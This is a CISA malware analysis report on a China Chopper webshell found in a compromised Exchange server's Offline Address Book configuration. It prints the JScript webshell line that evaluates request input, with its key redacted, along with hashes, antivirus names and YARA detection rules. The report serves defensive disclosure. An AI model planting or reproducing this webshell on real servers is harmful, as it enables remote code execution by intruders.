Analysis Report

MAR-10329298-1.v1: China Chopper Webshell

Last Revised
Alert Code
AR21-072E

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

CISA received one file for analysis. The file appears to contain configuration data for a Microsoft Exchange Offline Address Book (OAB) Virtual Directory (VD) extracted from a Microsoft Exchange Server. The output file shows malicious modifications for the ExternalUrl parameters for the VD on the targeted Exchange Server. The ExternalUrl parameter contains a "China Chopper" webshell which may permit a remote operator to dynamically execute JavaScript code on the compromised Microsoft Exchange Server.

For a downloadable copy of IOCs, see: MAR-10329298-1.v1.stix.

Submitted Files (1)

bda1b5b349bfc15b20c3c9cbfabd7ae8473cee8d000045f78ca379a629d97a61 (E3MsTjP8.aspx)

Findings

bda1b5b349bfc15b20c3c9cbfabd7ae8473cee8d000045f78ca379a629d97a61

Tags

backdoortrojanwebshell

Details
Name E3MsTjP8.aspx
Size 2353 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 ed0ec81113331d241f15e2ca73de1176
SHA1 0b68b4efe6cbe1e2db940486f089be7eefae6ceb
SHA256 bda1b5b349bfc15b20c3c9cbfabd7ae8473cee8d000045f78ca379a629d97a61
SHA512 e307f966fb1bdea44adfa5939da76f40e7082cac9014d18d21ba6d4f1a60aff022885cddf0670662595dc4078d68658a925f7f59e55827ae7ba2b7037e60e600
ssdeep 48:k/U0rdlD+1Bl6KIPQZfhMK6h4ONF0qQvym:kFdA8zjNCqm
Entropy 4.617817
Antivirus
Ahnlab Exploit/ASP.Cve-2021-27065.S1406
Avira EXP/CVE-2021-27065.1
BitDefender Generic.ASP.WebShell.H.2F07D1B3
ClamAV Asp.Trojan.Webshell0321-9840176-0
Emsisoft Generic.ASP.WebShell.H.2F07D1B3 (B)
Ikarus Exploit.ASP.CVE-2021-27065
Lavasoft Generic.ASP.WebShell.H.2F07D1B3
McAfee Exploit-CVE2021-27065.a
Microsoft Security Essentials Exploit:ASP/CVE-2021-27065
Quick Heal CVE-2021-26855.Webshll.41350
Sophos Troj/WebShel-L
Symantec Trojan.Chinchop
TrendMicro Backdoo.DDEA7357
TrendMicro House Call Backdoo.DDEA7357
YARA Rules
  • rule CISA_10328929_01 : trojan webshell exploit CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit CVE-2021-27065"

           Family = "HAFNIUM"

           Description = "Detects CVE-2021-27065 Webshellz"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }

           $s1 = { 65 76 61 6C 28 }

           $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }

           $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

           $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }

       condition:

           $s0 or ($s1 and $s2) or ($s3 and $s4)

    }
  • rule CISA_10328929_02 : trojan webshell exploit CVE_2021_27065

    {

       meta:

           Author = "CISA Code & Media Analysis"

           Incident = "10328929"

           Date = "2021-03-17"

           Last_Modified = "20210317_2200"

           Actor = "n/a"

           Category = "Trojan WebShell Exploit CVE-2021-27065"

           Family = "HAFNIUM"

           Description = "Detects CVE-2021-27065 Exchange OAB VD MOD"

           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"

           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"

       strings:

           $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }

           $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }

           $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }

       condition:

           $s0 and $s1 and $s2

    }
ssdeep Matches

No matches found.

Description

This file is an OAB configuration file. Analysis indicates this file contains log data collected from an OAB configured on a compromised Microsoft Exchange Server. The Exchange OAB VD is utilized to access Microsoft Exchange address lists. For this file, the OAB ExternalUrl parameter has been modified by a remote operator to include a "China Chopper" webshell which is likely an attempt to gain unauthorized access for dynamic remote code execution against a targeted Microsoft Exchange Server. In this file, the OAB ExternalUrl parameter was configured to accept JavaScript code which will directly be executed on the target system. The modification of the ExternalUrl parameter suggests the operator can dynamically submit queries to this Exchange OAB VD containing JavaScript code that will be executed on the target system.



In this file, the ExternalUrl designation that normally specifies the Uniform Resource Locator (URL) used to connect to the VD from outside the firewall has been replaced with the following code:



--Begin code--

hxxp[:]//f/<script language="JScript" runat="server">function Page_Load(){eval(Request["[REDACTED]"],"unsafe");}</script>

--End code--



Note: The hard-coded key used for authentication was redacted from the code above.



This file contains the following configuration data (sensitive data was redacted):



--Begin configuration data--

Name                            : OAB (Default Web Site)

PollInterval                    : 480

OfflineAddressBooks             : \Default Offline Address List (Ex2013)

RequireSSL                     : True

BasicAuthentication             : False

WindowsAuthentication         : True

OAuthAuthentication             : True

MetabasePath                    : IIS[:]//Saturn.city.[REDACTED].us/W3SVC/1/ROOT/OAB

Path                            : C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\OAB

ExtendedProtectionTokenChecking : None

ExtendedProtectionFlags         :

ExtendedProtectionSPNList     :

AdminDisplayVersion             : Version 15.1 (Build 1913.5)

Server                         : SATURN

InternalUrl                     : https://webmail.[REDACTED].org/oab

InternalAuthenticationMethods : OAuth

                                WindowsIntegrated

ExternalUrl                     : hxxp[:]//f/<script language="JScript" runat="server">function Page_Load(){eval(Request["[REDACTED]"],"unsafe");}</script>

ExternalAuthenticationMethods : OAuth

                                WindowsIntegrated

AdminDisplayName                :

ExchangeVersion                 : 0.10 (14.0.100.0)

DistinguishedName             : CN=OAB (Default Web Site),CN=HTTP,CN=Protocols,CN=SATURN,CN=Servers,CN=Exchange Administrative Group (FYDIBOHF23SPDLT),CN=Administrative Groups,CN=[Redacted],CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=city,DC=[Redacted],DC=ne,DC=us

Identity                        : SATURN\OAB (Default Web Site)

Guid                            : eb5dbf58-dc00-4a8d-86a6-13903cc4c84a

ObjectCategory                 : city.[Redacted].us/Configuration/Schema/ms-Exch-OAB-Virtual-Directory

ObjectClass                     : top

                                msExchVirtualDirectory

                                msExchOABVirtualDirectory

WhenChanged                     : 2/28/2021 2:09:16 PM

WhenCreated                     : 9/20/2017 5:35:27 PM

WhenChangedUTC                 : 2/28/2021 8:09:16 PM

WhenCreatedUTC                 : 9/20/2017 10:35:27 PM

OrganizationId                 :

Id                             : SATURN\OAB (Default Web Site)

OriginatingServer             : Police1.city.[Redacted].us

IsValid                         : True

--End configuration data--

Mitigation

If you find this webshell as you are examining your system for Microsoft Exchange Vulnerabilities, please visit the https://us-cert.cisa.gov/remediating-microsoft-exchange-vulnerabilities website for further information on remediation.

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Central.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.

Revisions

March 13, 2021: Initial Version|March 25, 2021: New YARA rule added

This product is provided subject to this Notification and this Privacy & Use policy.